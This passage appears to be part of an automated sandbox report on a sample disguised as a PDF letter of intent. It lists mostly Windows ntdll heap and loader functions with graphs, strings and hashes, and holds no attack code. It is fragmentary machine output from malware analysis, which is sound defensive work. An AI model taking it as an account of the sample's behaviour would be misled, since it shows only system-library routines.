                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: df252a3fbf20ba61d8130538d7c2ebb3e09648fa3f7f3e0ce9bac8505147db61
                                                                                      • Instruction ID: 0d4413dacd8f8e01b47684155e1fd37f32bd5f315eec7e0a745f278464cf4c45
                                                                                      • Opcode Fuzzy Hash: df252a3fbf20ba61d8130538d7c2ebb3e09648fa3f7f3e0ce9bac8505147db61
                                                                                      • Instruction Fuzzy Hash: BE90023120140423D11271589604707000947D0641F95C813A1434519D96568A56A162

                                                                                      Non-executed Functions

                                                                                      Function 330394E0 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 558timeCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 554 330394e0-33039529 555 3303952b-33039530 554->555 556 33039578-33039587 554->556 557 33039534-3303953a 555->557 556->557 558 33039589-3303958e 556->558 559 33039540-33039564 call 32fd9020 557->559 560 33039695-330396bd call 32fd9020 557->560 561 33039d13-33039d27 call 32fd4c30 558->561 568 33039593-33039634 GetPEB call 3303dc65 559->568 569 33039566-33039573 call 3305972b 559->569 570 330396bf-330396da call 33039d2a 560->570 571 330396dc-33039712 560->571 580 33039652-33039667 568->580 581 33039636-33039644 568->581 582 3303967d-33039690 RtlDebugPrintTimes 569->582 572 33039714-33039716 570->572 571->572 572->561 576 3303971c-33039731 RtlDebugPrintTimes 572->576 576->561 588 33039737-3303973e 576->588 580->582 584 33039669-3303966e 580->584 581->580 583 33039646-3303964b 581->583 582->561 583->580 586 33039673-33039676 584->586 587 33039670 584->587 586->582 587->586 588->561 590 33039744-3303975f 588->590 591 33039763-33039774 call 3303a808 590->591 594 33039d11 591->594 595 3303977a-3303977c 591->595 594->561 595->561 596 33039782-33039789 595->596 597 3303978f-33039794 596->597 598 330398fc-33039902 596->598 601 33039796-3303979c 597->601 602 330397bc 597->602 599 33039908-33039937 call 32fd9020 598->599 600 33039a9c-33039aa2 598->600 616 33039970-33039985 599->616 617 33039939-33039944 599->617 605 33039af4-33039af9 600->605 606 33039aa4-33039aad 600->606 601->602 607 3303979e-330397b2 601->607 603 330397c0-33039811 call 32fd9020 RtlDebugPrintTimes 602->603 603->561 643 33039817-3303981b 603->643 611 33039ba8-33039bb1 605->611 612 33039aff-33039b07 605->612 606->591 610 33039ab3-33039aef call 32fd9020 606->610 613 330397b4-330397b6 607->613 614 330397b8-330397ba 607->614 637 33039ce9 610->637 611->591 618 33039bb7-33039bba 611->618 620 33039b13-33039b3d call 33038513 612->620 621 33039b09-33039b0d 612->621 613->603 614->603 627 33039991-33039998 616->627 628 33039987-33039989 616->628 622 33039946-3303994d 617->622 623 3303994f-3303996e 617->623 624 33039bc0-33039c0a 618->624 625 33039c7d-33039cb4 call 32fd9020 618->625 640 33039b43-33039b9e call 32fd9020 RtlDebugPrintTimes 620->640 641 33039d08-33039d0c 620->641 621->611 621->620 622->623 636 330399d9-330399f6 RtlDebugPrintTimes 623->636 634 33039c11-33039c1e 624->634 635 33039c0c 624->635 652 33039cb6 625->652 653 33039cbb-33039cc2 625->653 630 330399bd-330399bf 627->630 638 3303998b-3303998d 628->638 639 3303998f 628->639 644 330399c1-330399d7 630->644 645 3303999a-330399a4 630->645 646 33039c20-33039c23 634->646 647 33039c2a-33039c2d 634->647 635->634 636->561 668 330399fc-33039a1f call 32fd9020 636->668 648 33039ced 637->648 638->627 639->627 640->561 686 33039ba4 640->686 641->591 654 3303986b-33039880 643->654 655 3303981d-33039825 643->655 644->636 649 330399a6 645->649 650 330399ad 645->650 646->647 658 33039c39-33039c7b 647->658 659 33039c2f-33039c32 647->659 657 33039cf1-33039d06 RtlDebugPrintTimes 648->657 649->644 660 330399a8-330399ab 649->660 662 330399af-330399b1 650->662 652->653 663 33039cc4-33039ccb 653->663 664 33039ccd 653->664 667 33039886-33039894 654->667 665 33039852-33039869 655->665 666 33039827-33039850 call 33038513 655->666 657->561 657->641 658->657 659->658 660->662 669 330399b3-330399b5 662->669 670 330399bb 662->670 671 33039cd1-33039cd7 663->671 664->671 665->667 673 33039898-330398ef call 32fd9020 RtlDebugPrintTimes 666->673 667->673 684 33039a21-33039a3b 668->684 685 33039a3d-33039a58 668->685 669->670 677 330399b7-330399b9 669->677 670->630 678 33039cd9-33039cdc 671->678 679 33039cde-33039ce4 671->679 673->561 690 330398f5-330398f7 673->690 677->630 678->637 679->648 687 33039ce6 679->687 688 33039a5d-33039a8b RtlDebugPrintTimes 684->688 685->688 686->611 687->637 688->561 692 33039a91-33039a97 688->692 690->641 692->618
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: $ $0
                                                                                      • API String ID: 3446177414-3352262554
                                                                                      • Opcode ID: 3683cdad48500237d1b2db13892c0118c7720f68a5a4971e715db05b622dfe84
                                                                                      • Instruction ID: b2ad119a25135dbb3e2f50faa9df759b75165b322253ebff6649864efdb37ff0
                                                                                      • Opcode Fuzzy Hash: 3683cdad48500237d1b2db13892c0118c7720f68a5a4971e715db05b622dfe84
                                                                                      • Instruction Fuzzy Hash: 413221B1A093818FE350CF68C884B5BBBE4BF89354F04496EF5D987290D775E948CB52
                                                                                      Function 33040274 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1297 33040274-33040296 call 32fe7e54 1300 330402b5-330402cd call 32f876b2 1297->1300 1301 33040298-330402b0 RtlDebugPrintTimes 1297->1301 1306 330406f7 1300->1306 1307 330402d3-330402e9 1300->1307 1305 33040751-33040760 1301->1305 1308 330406fa-3304074e call 33040766 1306->1308 1309 330402f0-330402f2 1307->1309 1310 330402eb-330402ee 1307->1310 1308->1305 1311 330402f3-3304030a 1309->1311 1310->1311 1313 33040310-33040313 1311->1313 1314 330406b1-330406ba GetPEB 1311->1314 1313->1314 1316 33040319-33040322 1313->1316 1318 330406bc-330406d7 GetPEB call 32f8b970 1314->1318 1319 330406d9-330406de call 32f8b970 1314->1319 1320 33040324-3304033b call 32f9ffb0 1316->1320 1321 3304033e-33040351 call 33040cb5 1316->1321 1324 330406e3-330406f4 call 32f8b970 1318->1324 1319->1324 1320->1321 1332 33040353-3304035a 1321->1332 1333 3304035c-33040370 call 32f8758f 1321->1333 1324->1306 1332->1333 1336 33040376-33040382 GetPEB 1333->1336 1337 330405a2-330405a7 1333->1337 1339 33040384-33040387 1336->1339 1340 330403f0-330403fb 1336->1340 1337->1308 1338 330405ad-330405b9 GetPEB 1337->1338 1341 33040627-33040632 1338->1341 1342 330405bb-330405be 1338->1342 1345 330403a6-330403ab call 32f8b970 1339->1345 1346 33040389-330403a4 GetPEB call 32f8b970 1339->1346 1343 33040401-33040408 1340->1343 1344 330404e8-330404fa call 32fa27f0 1340->1344 1341->1308 1353 33040638-33040643 1341->1353 1348 330405c0-330405db GetPEB call 32f8b970 1342->1348 1349 330405dd-330405e2 call 32f8b970 1342->1349 1343->1344 1352 3304040e-33040417 1343->1352 1367 33040590-3304059d call 330411a4 call 33040cb5 1344->1367 1368 33040500-33040507 1344->1368 1356 330403b0-330403d1 call 32f8b970 GetPEB 1345->1356 1346->1356 1366 330405e7-330405fb call 32f8b970 1348->1366 1349->1366 1359 33040438-3304043c 1352->1359 1360 33040419-33040429 1352->1360 1353->1308 1361 33040649-33040654 1353->1361 1356->1344 1386 330403d7-330403eb 1356->1386 1362 3304044e-33040454 1359->1362 1363 3304043e-3304044c call 32fc3bc9 1359->1363 1360->1359 1369 3304042b-33040435 call 3304dac6 1360->1369 1361->1308 1370 3304065a-33040663 GetPEB 1361->1370 1374 33040457-33040460 1362->1374 1363->1374 1398 330405fe-33040608 GetPEB 1366->1398 1367->1337 1377 33040512-3304051a 1368->1377 1378 33040509-33040510 1368->1378 1369->1359 1371 33040665-33040680 GetPEB call 32f8b970 1370->1371 1372 33040682-33040687 call 32f8b970 1370->1372 1395 3304068c-330406ac call 330386ba call 32f8b970 1371->1395 1372->1395 1384 33040472-33040475 1374->1384 1385 33040462-33040470 1374->1385 1388 3304051c-3304052c 1377->1388 1389 33040538-3304053c 1377->1389 1378->1377 1396 330404e5 1384->1396 1397 33040477-3304047e 1384->1397 1385->1384 1386->1344 1388->1389 1399 3304052e-33040533 call 3304dac6 1388->1399 1392 3304056c-33040572 1389->1392 1393 3304053e-33040551 call 32fc3bc9 1389->1393 1404 33040575-3304057c 1392->1404 1411 33040563 1393->1411 1412 33040553-33040561 call 32fbfe99 1393->1412 1395->1398 1396->1344 1397->1396 1403 33040480-3304048b 1397->1403 1398->1308 1405 3304060e-33040622 1398->1405 1399->1389 1403->1396 1409 3304048d-33040496 GetPEB 1403->1409 1404->1367 1410 3304057e-3304058e 1404->1410 1405->1308 1414 330404b5-330404ba call 32f8b970 1409->1414 1415 33040498-330404b3 GetPEB call 32f8b970 1409->1415 1410->1367 1417 33040566-3304056a 1411->1417 1412->1417 1423 330404bf-330404dd call 330386ba call 32f8b970 1414->1423 1415->1423 1417->1404 1423->1396
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                      • API String ID: 3446177414-1700792311
                                                                                      • Opcode ID: 67f18648a8b42b79c433ccca4874981ce5c31f977cbbec8a0926bbc79b6d08fb
                                                                                      • Instruction ID: 3d51d056fb4edc25a8ba27cb67113901398998067ce1d3e73a8264c2a2aaf21e
                                                                                      • Opcode Fuzzy Hash: 67f18648a8b42b79c433ccca4874981ce5c31f977cbbec8a0926bbc79b6d08fb
                                                                                      • Instruction Fuzzy Hash: A7D1FE75900685DFDB02DF68C540AAEFBF1FF49710F4888A9E585AB662C7389A81CF14
                                                                                      Function 3303F525 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                      • API String ID: 3446177414-1745908468
                                                                                      • Opcode ID: 58146b76f4db5636b3089599358493023e17e55361792c8f0692ec4770792c52
                                                                                      • Instruction ID: 25c9553b7031d52d425c638b73fc291e298a6ef873a7e68e50558c9c196e9347
                                                                                      • Opcode Fuzzy Hash: 58146b76f4db5636b3089599358493023e17e55361792c8f0692ec4770792c52
                                                                                      • Instruction Fuzzy Hash: 8A912135902740DFEB01CF68C440AAEFBF2FF4A724F1889D9E599AB261CB759941CB14
                                                                                      Function 330412ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                      • API String ID: 0-3591852110
                                                                                      • Opcode ID: bb62a23bc692f1339115c2154efce4c165062093e1450cb4866c822cd76f2de8
                                                                                      • Instruction ID: adcd172cc7250c5a169f173bfa41b8349e6d0ef3d578f7fe452fa56076fc2f4f
                                                                                      • Opcode Fuzzy Hash: bb62a23bc692f1339115c2154efce4c165062093e1450cb4866c822cd76f2de8
                                                                                      • Instruction Fuzzy Hash: 01129B74600742EFE7198F26C440BBABBF5EF09354F5888E9E5968BA51D734EA80CF50
                                                                                      Function 32F8D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                      • API String ID: 0-3532704233
                                                                                      • Opcode ID: 336310774e5567d5193eecc21c03f150a0e01cf7faa1821d0bceee49c16189ae
                                                                                      • Instruction ID: a5e3f39e50a1d01967053a3f2c2e0d632ee281ad96b26825132ffc17681cebff
                                                                                      • Opcode Fuzzy Hash: 336310774e5567d5193eecc21c03f150a0e01cf7faa1821d0bceee49c16189ae
                                                                                      • Instruction Fuzzy Hash: D0B19BB65083559FD715CF24C880B5BB7E8AF88798F414D2EFA99D7240DB70DA08CB92
                                                                                      Function 32FA1070 Relevance: 11.4, APIs: 2, Strings: 4, Instructions: 940timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                                      • API String ID: 3446177414-3570731704
                                                                                      • Opcode ID: dfee129700bb8a6ee2a199de2f1f94d42e82faa5c7b207b00165d7feca15eb1e
                                                                                      • Instruction ID: 58c446e4c77132ed6a82de8e439acd36dc7a61f9482412820bf4127fb5b5f7d9
                                                                                      • Opcode Fuzzy Hash: dfee129700bb8a6ee2a199de2f1f94d42e82faa5c7b207b00165d7feca15eb1e
                                                                                      • Instruction Fuzzy Hash: 9B927B75A00328DFEB24DF18C850F9AB7B5BF44754F0689EADA49A7290DB709E80CF51
                                                                                      Function 32FBD7B0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RtlDebugPrintTimes.NTDLL ref: 32FBD959
                                                                                        • Part of subcall function 32F94859: RtlDebugPrintTimes.NTDLL ref: 32F948F7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 3446177414-1975516107
                                                                                      • Opcode ID: f6ef514482c682dfd48b89d1bd4a4de6d5ea22d5e2ecf20c6b7a9b4f636e89d0
                                                                                      • Instruction ID: 060179dd0799cd88521671219a3686ff42d1e2e3f42cefe98da1611253cfce75
                                                                                      • Opcode Fuzzy Hash: f6ef514482c682dfd48b89d1bd4a4de6d5ea22d5e2ecf20c6b7a9b4f636e89d0
                                                                                      • Instruction Fuzzy Hash: 4F51FC76A003499FEF04DFA5C490B8DBBF1BF48718F244969CA056B291DBB5E842CF81
                                                                                      Function 32FBDB00 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                      • API String ID: 3446177414-3224558752
                                                                                      • Opcode ID: c670425ea54f7fd3a5b5048d9f5445295a15d9fe326e7885ba39f7ad014861cf
                                                                                      • Instruction ID: 6e7c80089be857935562a5642d415d074e7e60053a4ca174604456c529127fe2
                                                                                      • Opcode Fuzzy Hash: c670425ea54f7fd3a5b5048d9f5445295a15d9fe326e7885ba39f7ad014861cf
                                                                                      • Instruction Fuzzy Hash: 96412775A00744EFEB01CF25C494B5AB7F4EF45768F108EA9EB01976A0CF79A880CB91
                                                                                      Function 32FBDBA0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                                      • API String ID: 3446177414-1222099010
                                                                                      • Opcode ID: 6989fbaee277dc7f941b92cbcaac9c4ff2756dd63780e5a0b461a322dd37066f
                                                                                      • Instruction ID: 4e4d393f554f7bbe6a1d563299553ab33d1373aa0efcf8b49514a66e60d6cde6
                                                                                      • Opcode Fuzzy Hash: 6989fbaee277dc7f941b92cbcaac9c4ff2756dd63780e5a0b461a322dd37066f
                                                                                      • Instruction Fuzzy Hash: D4317C36104788EFF712DF24C414F5AB7E4EF01754F004DD4EA459BAA1CBB9A880CB52
                                                                                      Function 33029179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                                      • API String ID: 0-3063724069
                                                                                      • Opcode ID: 498aed507726ac4ae8be3bc1c4d6c0391b64d3fc3cbfdc9eb7fa258e0d763c11
                                                                                      • Instruction ID: db0b9d34f3843adfdd447205f455ea4b9e5903aa3841fa7748db0b942c8612f1
                                                                                      • Opcode Fuzzy Hash: 498aed507726ac4ae8be3bc1c4d6c0391b64d3fc3cbfdc9eb7fa258e0d763c11
                                                                                      • Instruction Fuzzy Hash: 66D1B1B2804315AFE721CA54C844BAFBBECAF84754F454EA9FAC8E7150D770C9588BD2
                                                                                      Function 32F8D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • @, xrefs: 32F8D0FD
                                                                                      • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 32F8D262
                                                                                      • @, xrefs: 32F8D2AF
                                                                                      • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 32F8D146
                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 32F8D2C3
                                                                                      • Control Panel\Desktop\LanguageConfiguration, xrefs: 32F8D196
                                                                                      • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 32F8D0CF
                                                                                      • @, xrefs: 32F8D313
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                      • API String ID: 0-1356375266
                                                                                      • Opcode ID: 6f03c6869d33570751d019c18bc765bca7bb7e5aeaffff1d74f4122a39697fb1
                                                                                      • Instruction ID: 3da54449617d0ed993a83402c75a2ecedff8c88d841d2206e39c6c036de38a45
                                                                                      • Opcode Fuzzy Hash: 6f03c6869d33570751d019c18bc765bca7bb7e5aeaffff1d74f4122a39697fb1
                                                                                      • Instruction Fuzzy Hash: CBA11AB69083459FE311CF24C480B9BF7E8BF88759F404D2EEA9896240DB74D948CB93
                                                                                      Function 32F8F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                      • API String ID: 0-523794902
                                                                                      • Opcode ID: 65bffd1e3c85187a06473337e684833e85b423dab4d54b0830c3404bb416cfb5
                                                                                      • Instruction ID: 6edb6a9ff765282df225a0c83d2e953a86d56e5d8e3a4ca091bae6455c391ac1
                                                                                      • Opcode Fuzzy Hash: 65bffd1e3c85187a06473337e684833e85b423dab4d54b0830c3404bb416cfb5
                                                                                      • Instruction Fuzzy Hash: D342DE756083819FE306CF24D890B2AFBE5FF84758F544E6DEA868B251DB34D841CB92
                                                                                      Function 32FAB1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
